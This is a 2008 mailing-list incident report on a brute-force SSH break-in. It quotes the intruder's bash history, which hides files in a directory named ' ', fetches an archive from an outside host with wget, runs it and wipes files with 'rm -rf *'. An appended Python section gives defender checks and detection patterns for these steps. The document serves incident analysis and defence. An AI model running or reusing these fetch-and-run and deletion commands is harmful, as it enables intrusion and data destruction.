[K12OSN] OT: Break-In report

Rob Owens rob.owens at biochemfluidics.com
Wed Jan 2 13:52:58 UTC 2008

I thought you guys might be interested in seeing the tracks of a 
computer break-in.  I won't say whose system it was (to protect the 
embarrassed), but the break-in was nothing but a brute-force ssh attempt 
at guessing usernames and passwords.  A regular user account was 
compromised and here is his bash history:

> ls
> cd who
> ls
> exit
> w
> cd /var/tmp
> ls -a
> cd " 
> mkdir " "
> cd " "
> wget quest.dif.jp/x.tgz
> tar zxvf x.tgz
> cd x
> ./start dbdb
> cd ..
> ls -a
> rm -rf *
> passwd
> ls -a
> ps aux
> ps aux | grep dan  (note: the hacked user account was "dan")
> top
> who
> exit

I particularly like the use of " " as a directory name.  Nice and 
invisible.  Also note that the invader put his files in two directories 
which have the "sticky" bit set:  /dev/shm and /var/tmp

In the end, it seems that all the invader succeeded in doing was a bunch 
of port-scanning.  The OS is going to be re-installed anyway, just to be 

Are there any organizations out there that this should be reported to? 
(For instance, the way one might send reports to an antivirus group or a 
content filtering group).
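A defender's check for the two things the post points out (a whitespace-only directory name hiding in world-writable sticky directories such as /var/tmp and /dev/shm, and the fetch/unpack/run/wipe sequence visible in the user's shell history), written as an added example rather than code from the original post. The history sample is constructed to mirror the one above; the function names, labels and regexes are my own choices.

```python
import os
import re
import stat

# Drop points named in the post: world-writable directories with the sticky bit.
STICKY_DIRS = ["/var/tmp", "/dev/shm"]

def is_disguised_name(name: str) -> bool:
    """True for entry names that render as blank or near-blank in `ls -a`:
    whitespace-only (the " " directory from the post), dot/space-only
    lookalikes such as "...", or names carrying control characters."""
    if name.strip() == "" or name.strip(". ") == "":
        return True
    return any(ord(c) < 32 or ord(c) == 127 for c in name)

def scan_sticky_dirs(dirs=STICKY_DIRS):
    """Return paths of disguised entries in directories that are both
    world-writable and sticky; directories that do not exist are skipped."""
    hits = []
    for d in dirs:
        try:
            st = os.stat(d)
        except OSError:
            continue
        if not (st.st_mode & stat.S_ISVTX and st.st_mode & stat.S_IWOTH):
            continue
        for entry in os.scandir(d):
            if is_disguised_name(entry.name):
                hits.append(entry.path)
    return hits

# Indicators matching the sequence in the post: hide, fetch, unpack, run, wipe.
HISTORY_PATTERNS = [
    ("hide",   re.compile(r'^(cd|mkdir)\s+"\s*"')),
    ("fetch",  re.compile(r"^(wget|curl)\s")),
    ("unpack", re.compile(r"^tar\s+[a-z]*x")),
    ("exec",   re.compile(r"^\./\S+")),
    ("wipe",   re.compile(r"^rm\s+-rf\s+\*")),
]

def score_history(lines):
    """Return the set of indicator labels found in a list of history lines
    (a leading '> ' quote prefix, as in the mailing-list post, is stripped)."""
    seen = set()
    for line in lines:
        cmd = line.strip().lstrip("> ").strip()
        seen.update(label for label, pat in HISTORY_PATTERNS if pat.search(cmd))
    return seen

# Constructed sample modelled on the history quoted in the post.
CONSTRUCTED_HISTORY = ['> cd /var/tmp', '> mkdir " "', '> cd " "',
                       '> wget example.invalid/x.tgz', '> tar zxvf x.tgz',
                       '> cd x', '> ./start dbdb', '> cd ..', '> rm -rf *']
```

Running `score_history` over a real `~/.bash_history` and `scan_sticky_dirs()` on a live host gives a quick triage signal; the history check is only useful if the intruder did not clear the file.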
